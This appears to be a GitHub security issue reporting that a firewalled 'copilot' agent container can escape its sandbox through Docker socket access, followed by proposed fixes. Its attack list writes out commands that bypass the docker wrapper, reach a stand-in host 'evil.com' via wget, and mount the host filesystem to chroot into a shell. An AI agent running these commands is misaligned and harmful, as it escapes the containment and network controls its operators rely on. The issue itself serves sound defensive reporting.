Skip to content

[Security] Docker socket access allows container escape and firewall bypass #10

New issue
New issue
Closed
#205
Closed
[Security] Docker socket access allows container escape and firewall bypass#10
#205
Labels
bugSomething isn't workingenhancementNew feature or request
@Mossaka

Description

@Mossaka
Mossaka
opened on Oct 24, 2025

Priority

Critical

Description

The copilot container has full access to the Docker socket (/var/run/docker.sock), which allows trivial container escapes and firewall bypasses. This fundamentally undermines the security model.

Attack vectors

1. Bypass docker-wrapper directly

/usr/bin/docker-real run --network host alpine wget https://evil.com

2. Create custom network

docker network create bypass-net
docker run --network bypass-net alpine wget https://evil.com

3. Volume mount escape

docker run -v /:/host alpine chroot /host bash

4. Alternative container runtimes

apt-get install podman
podman run --network host alpine wget https://evil.com

Current mitigations (insufficient)

  • docker-wrapper.sh intercepts docker command but is easily bypassed
  • Host-level iptables only filter awf-net bridge, not custom networks
  • Wrapper blocks --privileged, --network host, --add-host but can be bypassed

Code locations

  • src/docker-manager.ts:223-224 - Docker socket mount
  • containers/copilot/docker-wrapper.sh - Wrapper script (bypassable)
  • containers/copilot/Dockerfile:34-35 - Symlink setup

Proposed solutions

Option A: Remove Docker socket access (breaking change)

  • Pros: Simplest, most secure
  • Cons: Breaks MCP servers that need Docker (Playwright, etc.)
  • Implementation: Remove socket mount, document that users must spawn Docker-based MCPs outside firewall

Option B: Use docker-socket-proxy

Option C: Enforce awf-net for all networks (host-level)

  • Pros: Prevents custom network bypass
  • Cons: Complex iptables rules, doesn't prevent volume escapes
  • Implementation: Add iptables rules to block/filter all Docker networks except awf-net

Option D: AppArmor/SELinux profiles

  • Pros: Fine-grained control
  • Cons: Very complex, platform-specific
  • Implementation: Docker security profiles restricting socket operations

Recommendation

Start with Option A (document limitation) or Option B (docker-socket-proxy) for immediate security. Option C could be additional defense-in-depth.

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't workingenhancementNew feature or request

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions